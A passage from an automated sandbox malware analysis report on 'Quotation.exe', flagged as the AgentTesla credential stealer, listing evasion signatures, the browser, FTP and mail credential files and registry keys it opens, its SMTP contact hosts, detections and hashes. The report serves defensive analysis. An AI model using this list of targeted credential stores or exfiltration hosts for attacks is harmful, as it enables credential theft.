                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_004035F1 mov eax, dword ptr fs:[00000030h]3_2_004035F1
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BE6B80 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc,0_2_00BE6B80
                      Source: C:\Users\user\Desktop\Quotation.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BEC0A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BEC0A3
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BEC080 SetUnhandledExceptionFilter,0_2_00BEC080
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BEC0A3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00BEC0A3
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BEC080 SetUnhandledExceptionFilter,1_2_00BEC080
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_00401E1D SetUnhandledExceptionFilter,3_2_00401E1D
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0040446F
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00401C88
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00401F30
                      Source: C:\Users\user\Desktop\Quotation.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Users\user\Desktop\Quotation.exeSection loaded: unknown target: C:\Users\user\Desktop\Quotation.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe 'C:\Users\user\Desktop\Quotation.exe' Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe C:\Users\user\Desktop\Quotation.exeJump to behavior
                      Source: Quotation.exe, 00000003.00000002.588794570.0000000001490000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: Quotation.exe, 00000003.00000002.588794570.0000000001490000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: Quotation.exe, 00000003.00000002.588794570.0000000001490000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: Quotation.exe, 00000003.00000002.588794570.0000000001490000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BED7B7 cpuid 0_2_00BED7B7
                      Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00BE8431 GetLocalTime,0_2_00BE8431
                      Source: C:\Users\user\Desktop\Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000003.00000002.588164369.0000000000F39000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.233917057.0000000000B80000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.589076176.0000000002AE2000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.585204726.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.226102208.0000000002D90000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.592948035.0000000003B61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.588949913.0000000002970000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 6084, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 5824, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 5852, type: MEMORY
                      Source: Yara matchFile source: 3.2.Quotation.exe.2970000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Quotation.exe.2970000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Quotation.exe.b80000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Quotation.exe.b80000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Quotation.exe.2d90000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Quotation.exe.2ae0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Quotation.exe.2d90000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Yara matchFile source: 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 5852, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000003.00000002.588164369.0000000000F39000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.233917057.0000000000B80000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.589076176.0000000002AE2000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.585204726.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.226102208.0000000002D90000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.592948035.0000000003B61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.588949913.0000000002970000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 6084, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 5824, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Quotation.exe PID: 5852, type: MEMORY
                      Source: Yara matchFile source: 3.2.Quotation.exe.2970000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Quotation.exe.2970000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Quotation.exe.b80000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Quotation.exe.b80000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Quotation.exe.2d90000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Quotation.exe.2ae0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Quotation.exe.2d90000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Disable or Modify Tools1OS Credential Dumping2System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information11Input Capture1File and Directory Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter2Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Credentials in Registry1System Information Discovery125SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSQuery Registry1Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol111SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion13LSA SecretsSecurity Software Discovery141SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection112Cached Domain CredentialsVirtualization/Sandbox Evasion13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Quotation.exe37%VirustotalBrowse
                      Quotation.exe43%ReversingLabsWin32.Trojan.Pwsx
                      Quotation.exe100%AviraHEUR/AGEN.1106536
                      Quotation.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.2.Quotation.exe.2ae0000.5.unpack100%AviraTR/Spy.Gen8Download File
                      3.2.Quotation.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://ShQsty.com0%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://OKmk0UVQzAElqL6wiCX.net0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://api.ipify.org%$0%Avira URL Cloudsafe
                      http://smtp.tthyssenkrupp.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      us2.smtp.mailhostbox.com
                      208.91.199.223
                      truefalse
                        high
                        smtp.tthyssenkrupp.com
                        unknown
                        unknowntrue
                          unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://OKmk0UVQzAElqL6wiCX.nettrue
                          • Avira URL Cloud: safe
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1Quotation.exe, 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://ShQsty.comQuotation.exe, 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://api.ipify.org%GETMozilla/5.0Quotation.exe, 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          low
                          http://DynDns.comDynDNSQuotation.exe, 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://us2.smtp.mailhostbox.comQuotation.exe, 00000003.00000002.591947363.0000000002E76000.00000004.00000001.sdmpfalse
                            high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haQuotation.exe, 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipQuotation.exefalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://api.ipify.org%$Quotation.exe, 00000003.00000002.589457084.0000000002B61000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://smtp.tthyssenkrupp.comQuotation.exe, 00000003.00000002.591947363.0000000002E76000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            208.91.199.223
                            unknownUnited States
                            394695PUBLIC-DOMAIN-REGISTRYUSfalse

                            General Information

                            Joe Sandbox Version:31.0.0 Red Diamond
                            Analysis ID:339119
                            Start date:13.01.2021
                            Start time:15:12:52
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 7m 20s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:Quotation.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:31
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@7/0@2/1
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 24.6% (good quality ratio 22.6%)
                            • Quality average: 78%
                            • Quality standard deviation: 31.4%
                            HCA Information:
                            • Successful, ratio: 96%
                            • Number of executed functions: 22
                            • Number of non-executed functions: 66
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 104.43.193.48, 104.42.151.234, 104.43.139.144, 23.210.248.85, 51.104.139.180, 92.122.213.194, 92.122.213.247, 20.54.26.129, 2.20.142.209, 2.20.142.210, 51.103.5.159, 52.155.217.156
                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            15:14:01API Interceptor979x Sleep call for process: Quotation.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            208.91.199.223Booking.exeGet hashmaliciousBrowse
                              C.V. - application letter.exeGet hashmaliciousBrowse
                                AWB & Shipping Document.exeGet hashmaliciousBrowse
                                  Y3fwLpzaXNZPaT6.exeGet hashmaliciousBrowse
                                    XyZQ7im2Dv.exeGet hashmaliciousBrowse
                                      FB-108N & FB-108NK #U8a62#U50f9 - #U7530#U52e4.exeGet hashmaliciousBrowse
                                        ESrYdvhNfV.exeGet hashmaliciousBrowse
                                          KBC Enquiry No.20201228.xlsxGet hashmaliciousBrowse
                                            LR8meXRan7.exeGet hashmaliciousBrowse
                                              Proforma Invoice.exeGet hashmaliciousBrowse
                                                Purchase order.exeGet hashmaliciousBrowse
                                                  181c6640-693e-417a-bc21-8e1fe6302632.exeGet hashmaliciousBrowse
                                                    QUOTATION OAED QUOTATION PRESENTATION.exeGet hashmaliciousBrowse
                                                      erew-436.exeGet hashmaliciousBrowse
                                                        Statement of Account.docGet hashmaliciousBrowse
                                                          vsl particulars.exeGet hashmaliciousBrowse
                                                            swift-advise.exeGet hashmaliciousBrowse
                                                              CHEMEX DUBAI.exeGet hashmaliciousBrowse
                                                                RFQ16-03-2020YT.exeGet hashmaliciousBrowse
                                                                  SR 16-30 nOV-2020 GULF AIR.exeGet hashmaliciousBrowse

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    us2.smtp.mailhostbox.comBooking.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.223
                                                                    MV. Double Miracle.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.225
                                                                    MV Double Miracle.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.224
                                                                    C.V. - application letter.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.223
                                                                    PO-SOT215006A.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.224
                                                                    AWB & Shipping Document.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.225
                                                                    invoice No 8882.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.224
                                                                    Shipping document.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.225
                                                                    Y3fwLpzaXNZPaT6.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.223
                                                                    XyZQ7im2Dv.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.223
                                                                    FB-108N & FB-108NK #U8a62#U50f9 - #U7530#U52e4.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.223
                                                                    Ldz62seIo3.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.225
                                                                    VPAPvqgfkf.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.225
                                                                    TTR payment amount 131,000 USD.xlsxGet hashmaliciousBrowse
                                                                    • 208.91.199.225
                                                                    ESrYdvhNfV.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.223
                                                                    DHL Delivery Confirmation.exeGet hashmaliciousBrowse
                                                                    • 208.91.198.143
                                                                    KBC Enquiry No.20201228.xlsxGet hashmaliciousBrowse
                                                                    • 208.91.199.223
                                                                    LR8meXRan7.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.223
                                                                    Proforma Invoice.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.223
                                                                    ThyssenKrupp AG Supplier Vendor Registration.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.225

                                                                    ASN

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    PUBLIC-DOMAIN-REGISTRYUSDoc_18420540.docGet hashmaliciousBrowse
                                                                    • 103.76.228.18
                                                                    Booking.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.223
                                                                    MV. Double Miracle.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.225
                                                                    MV Double Miracle.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.224
                                                                    RFQ0128SR20KWT_DEUNGJU_FAKRU_AND_NAVEED.exeGet hashmaliciousBrowse
                                                                    • 162.222.225.57
                                                                    C.V. - application letter.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.223
                                                                    PO-SOT215006A.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.224
                                                                    AWB & Shipping Document.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.223
                                                                    invoice No 8882.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.224
                                                                    Shipping document.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.225
                                                                    Y3fwLpzaXNZPaT6.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.224
                                                                    rib.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.108
                                                                    XyZQ7im2Dv.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.223
                                                                    FB-108N & FB-108NK #U8a62#U50f9 - #U7530#U52e4.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.223
                                                                    Ldz62seIo3.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.225
                                                                    VPAPvqgfkf.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.225
                                                                    TTR payment amount 131,000 USD.xlsxGet hashmaliciousBrowse
                                                                    • 208.91.199.225
                                                                    ESrYdvhNfV.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.223
                                                                    DHL Delivery Confirmation.exeGet hashmaliciousBrowse
                                                                    • 208.91.199.225
                                                                    KBC Enquiry No.20201228.xlsxGet hashmaliciousBrowse
                                                                    • 208.91.199.223

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    No created / dropped files found

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.764174747045879
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:Quotation.exe
                                                                    File size:440320
                                                                    MD5:c478a9dd6e72ac0e96aa0bd90d7b9ec2
                                                                    SHA1:e9084e9ccbcfb91547d292be1e76985b353d7ecd
                                                                    SHA256:e178d0ed3b308beca605b9b5f71fd420bb438dc2c12e37523982982d57df22a3
                                                                    SHA512:0a3f3adc1d153768c4542897a868d0a94043dac205e89dc923b993572bccbf98041c5aa68d70e561213769c0fbf9bb0973c5f586f2506dce3c9c580edb381650
                                                                    SSDEEP:6144:sr1I5DbAQcHAORYANcUR+pWGxFGvRmGYu7jqb1Ssa9OFznr8UUqLRmhbHdgGA:Q1I5fAPHXR+UbZdY51Tao17Fmhb9c
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tj.m'j.m'j.m'.Q.'k.m'.4.'I.m'.4.'r.m'.4.'..m'j.l'..m'...'..m'M7.'k.m'M7.'k.m'M7.'k.m'Richj.m'................PE..L...C.._...

                                                                    File Icon

                                                                    Icon Hash:00828e8e8686b000

                                                                    Static PE Info

                                                                    General

